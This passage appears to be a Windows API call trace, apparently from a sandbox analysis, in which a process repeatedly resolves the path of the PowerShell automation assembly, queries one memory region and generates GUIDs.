	[0143.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.915] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.915] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.916] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.916] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.917] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.917] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.917] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.917] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.917] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.918] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.918] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.918] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.918] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.918] VirtualQuery (in: lpAddress=0x1cb700, lpBuffer=0x1cc5c0, dwLength=0x30 | out: lpBuffer=0x1cc5c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.919] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.919] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.919] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.920] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.920] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xb43ca80e, Data2=0x72b9, Data3=0x42f8, Data4=([0]=0xbc, [1]=0xbb, [2]=0x34, [3]=0xa, [4]=0x96, [5]=0xa, [6]=0xf1, [7]=0xe2))) returned 0x0
	[0143.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.921] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xe6602f25, Data2=0x23f7, Data3=0x45af, Data4=([0]=0x87, [1]=0x84, [2]=0x5f, [3]=0xa6, [4]=0x5, [5]=0xf9, [6]=0x1c, [7]=0xc4))) returned 0x0
	[0143.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.925] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.925] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.925] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.926] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.926] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.927] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.927] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.928] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.928] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.929] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.929] VirtualQuery (in: lpAddress=0x1cb1c0, lpBuffer=0x1cc080, dwLength=0x30 | out: lpBuffer=0x1cc080*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.930] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
